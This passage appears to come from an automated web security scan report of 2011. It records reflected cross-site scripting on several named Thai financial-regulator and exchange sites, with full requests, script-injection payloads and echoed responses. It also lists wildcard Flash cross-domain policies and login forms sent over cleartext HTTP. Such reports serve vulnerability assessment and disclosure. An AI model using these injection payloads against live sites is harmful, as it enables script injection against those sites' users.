The value of the pagename request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75674"%3balert(1)//81f24abd258 was submitted in the pagename parameter. This input was echoed as 75674";alert(1)//81f24abd258 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /view/truehitsstat.jsp?pagename=SEC%20Home%20Page75674"%3balert(1)//81f24abd258 HTTP/1.1
Host: www.sec.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sec.or.th/view/view.jsp?lang=th
Cookie: JSESSIONID=C028BE300AB1D863D9A32BEB707CB147

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:05:14 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7d mod_jk/1.2.25 PHP/5.2.4
Content-Length: 285
Content-Type: text/html;charset=utf-8

<style type="text/css">

</style>
<script language="javascript1.1">page="SEC Home Page75674";alert(1)//81f24abd258";</script>
<script language
...[SNIP]...

2.15. http://www.sec.or.th/view/view.jsp [lang parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sec.or.th
Path:	/view/view.jsp

Issue detail

The value of the lang request parameter is copied into a JavaScript rest-of-line comment. The payload b6304%0aalert(1)//5d8b0f7066a was submitted in the lang parameter. This input was echoed as b6304
alert(1)//5d8b0f7066a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /view/view.jsp?lang=thb6304%0aalert(1)//5d8b0f7066a HTTP/1.1
Host: www.sec.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sec.or.th/
Cookie: JSESSIONID=C028BE300AB1D863D9A32BEB707CB147

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:02:13 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7d mod_jk/1.2.25 PHP/5.2.4
Content-Type: text/html;charset=utf-8
Content-Length: 88428

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<LINK REL="SHORTCUT ICON" HREF="sec.ico">
<head>

<title>SEC, Thailand</title>

<me
...[SNIP]...
= encodeURIComponent(wordSearch);

window.open('/view/thb6304
alert(1)//5d8b0f7066a/searchengine.jsf?word='+wordSearch,'_blank','');

//window.open('http://10.0.0.240:8080/view/thb6304
alert(1)//5d8b0f7066a/searchengine.jsf?word='+wordSearch,'_blank','');

}

function namosw_goto_byselect(sel, targetstr)

{

var index = sel.selectedIndex;

if (sel.options[index].
...[SNIP]...

2.16. http://www.sec.or.th/view/view.jsp [lang parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sec.or.th
Path:	/view/view.jsp

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16eb3"><script>alert(1)</script>434d97b3da3 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /view/view.jsp?lang=th16eb3"><script>alert(1)</script>434d97b3da3 HTTP/1.1
Host: www.sec.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sec.or.th/
Cookie: JSESSIONID=C028BE300AB1D863D9A32BEB707CB147

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:02:04 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7d mod_jk/1.2.25 PHP/5.2.4
Content-Type: text/html;charset=utf-8
Content-Length: 88474

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<LINK REL="SHORTCUT ICON" HREF="sec.ico">
<head>

<title>SEC, Thailand</title>

<me
...[SNIP]...
<a href="/view/view.jsp?lang=en16eb3"><script>alert(1)</script>434d97b3da3" class="detail-small">
...[SNIP]...

2.17. http://www.sec.or.th/view/view.jsp [lang parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sec.or.th
Path:	/view/view.jsp

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdf1c'%3balert(1)//9465eb3d2be was submitted in the lang parameter. This input was echoed as cdf1c';alert(1)//9465eb3d2be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /view/view.jsp?lang=thcdf1c'%3balert(1)//9465eb3d2be HTTP/1.1
Host: www.sec.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sec.or.th/
Cookie: JSESSIONID=C028BE300AB1D863D9A32BEB707CB147

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:02:09 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7d mod_jk/1.2.25 PHP/5.2.4
Content-Type: text/html;charset=utf-8
Content-Length: 88431

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<LINK REL="SHORTCUT ICON" HREF="sec.ico">
<head>

<title>SEC, Thailand</title>

<me
...[SNIP]...
}

function openSearchEngine(){

   var wordSearch = document.getElementById('wordForSearch').value;

   wordSearch = encodeURIComponent(wordSearch);

   window.open('/view/thcdf1c';alert(1)//9465eb3d2be/searchengine.jsf?word='+wordSearch,'_blank','');

//window.open('http://10.0.0.240:8080/view/thcdf1c';alert(1)//9465eb3d2be/searchengine.jsf?word='+wordSearch,'_blank','');

}

...[SNIP]...

2.18. http://www.sec.or.th/view/view.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sec.or.th
Path:	/view/view.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a796f"><script>alert(1)</script>3243b451583 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /view/view.jsp?lang=th&a796f"><script>alert(1)</script>3243b451583=1 HTTP/1.1
Host: www.sec.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sec.or.th/
Cookie: JSESSIONID=C028BE300AB1D863D9A32BEB707CB147

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:06:19 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7d mod_jk/1.2.25 PHP/5.2.4
Content-Type: text/html;charset=utf-8
Content-Length: 108455

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<LINK REL="SHORTCUT ICON" HREF="sec.ico">
<head>

<title>SEC, Thailand</title>

<me
...[SNIP]...
<a href="/view/view.jsp?lang=en&a796f"><script>alert(1)</script>3243b451583=1" class="detail-small">
...[SNIP]...

2.19. http://www.set.or.th/set/newslist.do [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/set/newslist.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c7b03'><script>alert(1)</script>bdd3572e91d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /set/newslist.do?language=en&country=US&to=&exchange=true&submit=Search&newsType=CASH_BALANCE&exchangeSymbols=&companyNews=on&from=&exchangeNews=on&company=true&symbol=&headline=to+be+traded+in+Cash+Balance&c7b03'><script>alert(1)</script>bdd3572e91d=1 HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: verify=test; JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 16:09:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Set-Cookie: JSESSIONID=D1F84ABE20388911921B4CC059131C25; Path=/set
Content-Length: 64801

<html>
<head>
<link href="/set/styles/setstyle.css" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" type="text/css">
<link href="/menuFile/menu.
...[SNIP]...
<a href='http://www.set.or.th/set/newslist.do?c7b03'><script>alert(1)</script>bdd3572e91d=1&companyNews=on&from=&language=en&company=true&symbol=&to=&exchange=true&submit=Search&country=US&newsType=CASH_BALANCE&exchangeSymbols=&currentpage=1&exchangeNews=on&headline=to+be+traded+in+Cash+Ba
...[SNIP]...

2.20. http://www.thai-iod.com/en/index.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thai-iod.com
Path:	/en/index.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58d56"><script>alert(1)</script>c0e507e3110 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/index.asp?58d56"><script>alert(1)</script>c0e507e3110=1 HTTP/1.1
Host: www.thai-iod.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.thai-iod.com/

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:03:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Content-Length: 42136
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAQRSTSCC=LNGFCNPDBENMKEDJNOODCPGL; path=/
Cache-control: private



<html>
<head>
<title>Thai Institute of Directors</title>
<meta http-equiv="Content-Type" content="text/html;charset=TIS-620">

...[SNIP]...
<a href="javascript:void(0);" onClick="MM_openBrWindow('emailThisPage.asp?url=http://www.thai-iod.com/en/index.asp?58d56"><script>alert(1)</script>c0e507e3110=1','','scrollbars=yes,resizable=yes,width=400px,height=580px')" class="link2" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image9','','img/2nav07_over.gif',1)">
...[SNIP]...

3. Flash cross-domain policy previous next
There are 5 instances of this issue:

http://capital.sec.or.th/crossdomain.xml
http://zeus.flexserving.com/crossdomain.xml
http://feeds.bbci.co.uk/crossdomain.xml
http://newsrss.bbc.co.uk/crossdomain.xml
http://weblink.settrade.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

3.1. http://capital.sec.or.th/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://capital.sec.or.th
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: capital.sec.or.th

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:03:31 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8h PHP/4.3.3
Last-Modified: Mon, 22 Feb 2010 02:47:06 GMT
ETag: "65ede-cb-72dcde80"
Accept-Ranges: bytes
Content-Length: 203
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

3.2. http://zeus.flexserving.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://zeus.flexserving.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: zeus.flexserving.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:40:54 GMT
Server: Apache/2.2.8 (EL)
Last-Modified: Thu, 05 Aug 2010 09:37:20 GMT
ETag: "508003-c8-48d104bf23400"
Accept-Ranges: bytes
Content-Length: 200
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.3. http://feeds.bbci.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Server: Apache
Content-Type: text/xml
Cache-Control: max-age=85
Expires: Tue, 03 May 2011 15:13:05 GMT
Date: Tue, 03 May 2011 15:11:40 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

3.4. http://newsrss.bbc.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Tue, 03 May 2011 15:13:22 GMT
Date: Tue, 03 May 2011 15:11:22 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

3.5. http://weblink.settrade.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://weblink.settrade.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: weblink.settrade.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:37:19 GMT
Server: Unknown
Last-Modified: Tue, 18 Jul 2006 12:31:30 GMT
ETag: "1f4649-3f1-418da5384ec80"
Accept-Ranges: bytes
Content-Length: 1009
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www1.settrade.com" secure="false" />
<allow-access-from domain="wwwa1.settrade.com" secure="false" />
<allow-access-from domain="wwwa2.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwa3.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwb1.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwb2.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwb3.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwc1.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwc2.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwd1.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwe1.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwf1.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www.phatradirect.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www2.phatradirect.com" secure="false" />
...[SNIP]...

4. Cleartext submission of password previous next
There are 5 instances of this issue:

/
/ScreeningRoom.aspx
/Subscription.aspx
/forgetpassword.aspx
/signin.aspx

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

4.1. http://www.mymemorysafe.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mymemorysafe.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.mymemorysafe.com/ScreeningRoom.aspx

The form contains the following password field:

ctl00$_contentBody$txtPassword

Request

GET / HTTP/1.1
Host: www.mymemorysafe.com
Proxy-Connection: keep-alive
Referer: http://www.mymemorysafe.com/Subscription.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whxd3rnvc4hjzp45k0nhmh55; __utmz=211617801.1304453582.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=211617801.1268033327.1304453582.1304453582.1304453582.1; __utmc=211617801; __utmb=211617801.2.10.1304453582

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 15:14:44 GMT
Content-Length: 52728

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head id="ctl00_Head1">
...[SNIP]...
<div id="container">
<form name="aspnetForm" method="post" action="ScreeningRoom.aspx" id="aspnetForm">
<div>
...[SNIP]...
<td align="left" valign="middle">

<input name="ctl00$_contentBody$txtPassword" type="password" id="ctl00__contentBody_txtPassword" class="large2_imputbox" />
</td>
...[SNIP]...

4.2. http://www.mymemorysafe.com/ScreeningRoom.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mymemorysafe.com
Path:	/ScreeningRoom.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.mymemorysafe.com/ScreeningRoom.aspx

The form contains the following password field:

ctl00$_contentBody$txtPassword

Request

POST /ScreeningRoom.aspx HTTP/1.1
Host: www.mymemorysafe.com
Proxy-Connection: keep-alive
Referer: http://www.mymemorysafe.com/
Cache-Control: max-age=0
Origin: http://www.mymemorysafe.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whxd3rnvc4hjzp45k0nhmh55; __utmz=211617801.1304453582.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=211617801.1268033327.1304453582.1304453582.1304453582.1; __utmc=211617801; __utmb=211617801.2.10.1304453582; ASPSESSIONIDCQATQBST=CJIPFAODGDKMFBCDOJAIGGKP
Content-Length: 1803

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIzNzU5MTA1Nw9kFgJmD2QWAgIDD2QWAgIBD2QWAgIBD2QWEAIDDxYCHgdWaXNpYmxlZ2QCBQ8WAh4EaHJlZgUbaHR0cDovL3d3dy5teW1lbW9yeXNhZmUuY29tZAIHD2QWBAIBDxYCHwBoZA
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 15:20:16 GMT
Content-Length: 53115

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head id="ctl00_Head1">
...[SNIP]...
<div id="container">
<form name="aspnetForm" method="post" action="ScreeningRoom.aspx" id="aspnetForm">
<div>
...[SNIP]...
<td align="left" valign="middle">

<input name="ctl00$_contentBody$txtPassword" type="password" id="ctl00__contentBody_txtPassword" class="large2_imputbox" />
</td>
...[SNIP]...

4.3. http://www.mymemorysafe.com/Subscription.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mymemorysafe.com
Path:	/Subscription.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.mymemorysafe.com/Subscription.aspx

The form contains the following password field:

txtPassword

Request

GET /Subscription.aspx HTTP/1.1
Host: www.mymemorysafe.com
Proxy-Connection: keep-alive
Referer: http://www.mymemorysafe.com/forgetpassword.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whxd3rnvc4hjzp45k0nhmh55

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 15:19:20 GMT
Content-Length: 32413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...
<body>
<form name="form1" method="post" action="Subscription.aspx" id="form1">
<div>
...[SNIP]...
<td align="left" valign="middle">

<input name="txtPassword" type="password" id="txtPassword" class="large2_imputbox" />
</td>
...[SNIP]...

4.4. http://www.mymemorysafe.com/forgetpassword.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mymemorysafe.com
Path:	/forgetpassword.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.mymemorysafe.com/forgetpassword.aspx

The form contains the following password field:

ctl00$_contentBody$txtPassword

Request

GET /forgetpassword.aspx HTTP/1.1
Host: www.mymemorysafe.com
Proxy-Connection: keep-alive
Referer: http://www.mymemorysafe.com/signin.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whxd3rnvc4hjzp45k0nhmh55

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 15:19:14 GMT
Content-Length: 18411

